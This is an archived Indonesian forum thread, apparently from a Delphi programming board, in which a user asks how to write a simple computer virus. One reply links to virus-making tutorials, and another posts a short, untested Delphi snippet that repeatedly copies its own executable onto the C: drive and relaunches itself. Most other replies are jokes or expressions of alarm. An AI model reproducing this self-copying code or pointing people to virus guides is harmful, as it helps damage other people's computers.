Arsip: tolongin y .....

 
user image
more 14 years ago

belly

aq mo nanya........................... gmn cara buat virus yg sederhana aja dulu thx sebelumnya y..................
user image
more 14 years ago

MrLee

coba aja mampir ke sini http://sahammudien.wordpress.com/2007/12/12/make-virus-via-notepad/ ato http://fuangpoetry.blogspot.com/2008/01/cara-membuat-virus.html ato http://www.google.co.id/search?q=tool+make.virus&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
user image
more 14 years ago

ansr

wess, apaan tuh.... ngeri deh...
user image
more 14 years ago

yusdi

wah ga jelas neh tujuannya.... takuuutttt...
user image
more 14 years ago

n3o_cybertech

wah buat virus koq bingung, coba aja neh kode :

procedure TButton1.onClick(Sender  TObject);
var i: integer;
begin
for i:=0 to GetTickCount do
 begin
  CopyFile(PChar(Application.ExeName),'c:\virusku ke-' + PChar(IntToStr(i)),False);
 end;
end;
procedure TTimer1.onTimer(Sender   TObject);
begin
ShellExecute(Application.Handle,'open',PChar(Application.exename), '','',SW_SHOW );
end;
he3x...itu contoh senderhananya tapi gak tau jalan pa gak...kalo gak ya maap ya...!!!
user image
more 14 years ago

pebbie

posting pertama nanya bwt virus.. ckckckck
user image
more 14 years ago

DelphiExpert

saya bisanya cuman buat virus yg aneh-aneh & mengerikan! jadi kalau anda tanya bikin virus yg sederhana saya malah bingung... :lol: cuman... virus yg saya buat sifatnya musiman... biasanya pas musim hujan atau musim perpindahan pancaroba... macam2 virusnya, mulai virus flue / influenza, batuk (berdahak / berdarah) ampe virus tongpes :mrgreen: mau?
user image
more 14 years ago

DelphiExpert

oh iya... tempo-bulan saya berhasil membuat virus yg mematikan! sekarang terkenal dn nama virus flue-burung! belum ada antivir yg sanggup mendepak dari resident memory tuh... cuman saya sedikit kecewa... pasalnya virus tersebut saya design utk menyerang anjing tetangga saya yg tiap malam pasti menggonggong bikin ribut... :( apes-nya, waktu saya jemur virus tsb di pagi hari sebelum resmi saya launch... eehhh... dipatok ayam deh... mampus ayamnya deh... sebelum mampus itu ayam rupanya sempat nggosip dulu ama temen-temennya... jadinya nyebar deeehhh... hmm, mungkin saya terlalu pintar... virus tsb saya design terlalu canggih!... ampe2 katanya sekarang udah mampu menulari manusia... aduh takuuut... jangan2 entar virus makan tuan! :mrgreen: catatan: maaf, seharusnya ini ada dlm (wc) umum...
user image
more 14 years ago

yusdi

ada ada saja ya mas ini....wakakakaka....
user image
more 13 years ago

wanks

aku mau tnya agar delphi 6 bisa baca istring gmn ?? thanks
more ...
  • Pages:
  • 1
  • 2
Share to
Local Business Directory, Search Engine Submission & SEO Tools FreeWebSubmission.com SonicRun.com